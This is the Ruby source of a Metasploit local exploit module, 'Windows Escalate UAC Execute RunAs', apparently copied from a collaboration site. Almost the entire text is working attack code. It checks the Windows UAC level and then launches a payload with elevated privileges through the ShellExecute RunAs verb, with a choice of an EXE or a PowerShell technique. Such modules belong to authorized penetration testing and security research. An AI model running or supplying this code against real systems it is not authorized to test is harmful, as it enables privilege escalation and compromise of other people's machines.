Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Post::Windows::Priv
10
  include Post::Windows::Runas
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'          => 'Windows Escalate UAC Execute RunAs',
15
      'Description'   => %q(
16
        This module will attempt to elevate execution level using
17
        the ShellExecute undocumented RunAs flag to bypass low
18
        UAC settings.
19
      ),
20
      'License'       => MSF_LICENSE,
21
      'Author'        => [
22
        'mubix', # Original technique
23
        'b00stfr3ak' # Added powershell option
24
      ],
25
      'Platform'      => ['win'],
26
      'SessionTypes'  => ['meterpreter'],
27
      'Targets'       => [['Windows', {}]],
28
      'DefaultTarget' => 0,
29
      'DisclosureDate' => '2012-01-03'
30
    ))
31

32
    register_options([
33
      OptString.new('FILENAME', [false, 'File name on disk']),
34
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
35
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
36
    ])
37
  end
38

39
  def exploit
40
    if is_uac_enabled?
41
      print_status 'UAC is Enabled, checking level...'
42
      case get_uac_level
43
      when UAC_NO_PROMPT
44
        print_good 'UAC is not enabled, no prompt for the user'
45
      else
46
        print_status "The user will be prompted, wait for them to click 'Ok'"
47
      end
48
    else
49
      print_good 'UAC is not enabled, no prompt for the user'
50
    end
51

52
    case datastore['TECHNIQUE']
53
    when 'EXE'
54
      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
55
    when 'PSH'
56
      shell_execute_psh
57
    end
58
  end
59
end
60

61